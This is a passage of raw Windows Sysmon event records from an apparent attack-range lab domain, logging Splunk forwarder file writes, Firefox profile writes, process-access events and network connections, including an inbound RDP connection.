Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.287{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F603-60EB-917D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.132{466BC892-F603-60EB-917D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.661{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F08219E8F1435046E337871A166BDC3,SHA256=D31D2A1915E11F2991470CE2987337C445B762A6508079C46F342636E0A91883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:56.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D15D4E3DD039F30DEF8546E27C832C89,SHA256=D201DE26E5395F319BAAA089CD6EBD7E3A0A279E286332B14271EA7612E9EA58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.408{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B18EDA719B4587CC60AFA953645135CC,SHA256=8124CEB9ADAE4D324E9637477114C0AC9F10854F9F933B6466A3A2F06E1E824E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.408{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7917979FEC5F38BC0DE1C8F17135A470,SHA256=281113C086FE7CC294C5E377DEC3EBF75AE60CAF667D31A468559C827002A2D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C4235FA3DAFFE5070EAA9BBE45E60573,SHA256=A8C2D2F29DD53A61742D7D00447C09A27D7CEC64809371F5F93FC22D35D684A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=426C8A36FA5E820B471505A9FF3E2068,SHA256=B90CEC7B61CA14BE78929EB74573DA068F5B1D3FEE24A01982FBD36C0123652F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=317DE19AB238BF1B6DB06AD8AA37F437,SHA256=5846E56CC2CE69FABAC9C3C5BD36423A4C27310F7A3633FBAC16A64146420A2B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=117B0467D473090E8089FB3569BBD157,SHA256=7345401213231365E10595E37FB5A745FD4D49F7567060184A6811F4B642C45D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=153DD101D5D27D9B08A3A16D5DA325E4,SHA256=B41C92D87C39B1A0A8D727FCE5ECE3749CC4D15946CEE86740D0037FCB2CCEB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A5A0976D3F584059A14903EB6D14A237,SHA256=4B5408062A81625EB50CC8D57E59FBAE3F2E12A787D908BD20C286D5FC399D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B0E4F285911A0CC8EBF548DF76576CCD,SHA256=917C0A4F1E6675532FFA8BC7F7D5411F565197B978B5A3CA2012541E0CA83459,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9FF99DA8A9C41C4E782EDECB895F895F,SHA256=A33A3D7265F4D9DE1BF6094CAD2EE44B8064B26B2BE2EE7D378B1A50943965FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.393{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A31B59192DE3E16D24F268D179F89B0C,SHA256=C9D8E8A59BC3A879626FB0F00D566D929F0DA1EFA6CB9B8DD1D2943E84D9441F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:56.145{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D31C1C48C35B0B85D7D372B2A548FE9,SHA256=C05CA1763B5431C2D64BE7F8BE97CC2E522CECC6D2A75078099EDDC96E7D2A06,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:56.437{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57338-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000808594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:55.850{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-30525-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:57.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=553305B75748855F39A50CF0F006E81A,SHA256=222F05C44E68D3CF6F69BD989D8F06B73AC15C9F03CA67546E141D4EDB4AF379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:57.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E83D5F9DD75C7376A4A58C7ED3E2687,SHA256=5FF8252625F7360CA43D00C7ACC3883B944F6B6A48AF3D174EB934213073B31B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:57.293{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=214CE1D84718009EA33CC1F183183B6C,SHA256=CECA7CC9823329F5E59FC51EECB61F0B278EF4698F242E6CEBA7E82E93CF72DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:57.676{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=450F5AB59D0DA7885375272C52050884,SHA256=8EA12A0BEE054E5FEDFB5FCC97268B54B7BB2F0CA7939F3B49156D1665F3C749,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:57.127{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:58.691{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2799C1F5A9A79EF2C2F6E5AE13C541B,SHA256=B941B0A4E0D57808A3C4D3F5FAE3196C2870C45A425796BCDC215AC9FFF8ADBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:58.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F70299B68E89151B6B67618385D0747,SHA256=50D6658699A8D014C4EBF99AE63366B4C92CDC79944D2955DFFE748FE064DBEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.644{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51105-false10.0.1.12-8089- 354300x80000000000000001051537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.824{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57338-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001051536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.660{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51104-false10.0.1.12-8000- 23542300x80000000000000001051540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:59.705{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B63F30ED26851D1359DB57C64AB76B9,SHA256=FE701C3D49347EE52407D87E00037650C7365B0470E45AF75B0CB06168291915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:59.575{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C00F2D43C65BA1DD5FD319FDE67252B,SHA256=93893C0B6F5BFC37C3937B6C01058DC67C1DA7BA4777D12B667F3D9267735A49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:00.606{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E5B4BE1208EE91EE8ACD13F9876D25,SHA256=D0969A63A5CB1FD5EE14011ED54085052C2E092F08091E1BAFB38F3F4045BA7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:00.723{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96519FEBE5F654897AC524A9B9883CD4,SHA256=1B4CCE5FB415F1F8F126805DAA7B02F53F28FC1A8A7510368E0E16E6D6CAE0B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:01.653{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=546C9D55CF797476D1FB686DD1A0F94F,SHA256=9999CE38490D3CA1190735EDCF1E3B50BDC0B3BACAD3B5B522DBC50B5D5829A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:01.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F46002AF12E84DD61486F0163456F0A7,SHA256=FC279000A9FFB2DD3CC8B8EF952545C648BA2FA1BC0D3818C08776CEDE947307,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000808599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:59.363{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57339-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:02.684{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=861BD3CE21F2EA1534301E2FEE673AD4,SHA256=DDB0F24030F6F24D318BCFFF3980C7E2B57BF6209889751EC55A2302C0BD763D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:02.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82CC1BB4FE653F9E5AF94D987D74BFB8,SHA256=92B18E462B815EB7AD835DD9AC865FED372516A56B7EB361D83AEF704022CDFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:03.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2E136FED7F9BC51B4E16E9C095668D9,SHA256=98604850EBF68D0ACB817ED276E25769A294595434EA392D842A830269B180C2,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:03.700{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8BAE1B6778DBBE7759761CFFD36F525,SHA256=98730781CFDE6820EB12BFECDA37055C58F3EB96CA26216F15BC4A1B48878ACD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51106-false10.0.1.12-8000- 23542300x8000000000000000808603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:04.715{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C5665B9264D3250C0BCA426DCABF34,SHA256=7F1FEE8FAF18CCEE1E00279A395D0BE3817CBFDF89C5172C836884D49D304FC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:04.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7F705556D67AF540906D4A8207ADE49,SHA256=1DF2C04F8AE35669716DB1AA2C18D5557C6A771C4978EB7DC0840021CA93633D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:05.731{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E2F5E099201459162893BB8C296C6F0,SHA256=964F2F88DA528AAAF54C546C4979CC46C4A7696486BD33D34967105A48F20EB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:05.790{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B76D2F2485CA2FFD44A5F3CC02A45BCF,SHA256=214D58C3572CCE971B5C8EC8A351A8DC8B21C5AE8D8A9D2C2F96D03C849FC33C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:06.762{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A60EA443FC37C0E21356BBA69B042EE4,SHA256=6B752A2D620A6FE228415B3B508A004D45FB20F1F5BF6FBF9A374A79F969A56B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3055872DA73E40B4AFF2BE562F887353,SHA256=A2F20943899345980ABC43B17B2658F30E9513837942A51E431804172450C8FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:05.269{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57340-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000808607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:06.247{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
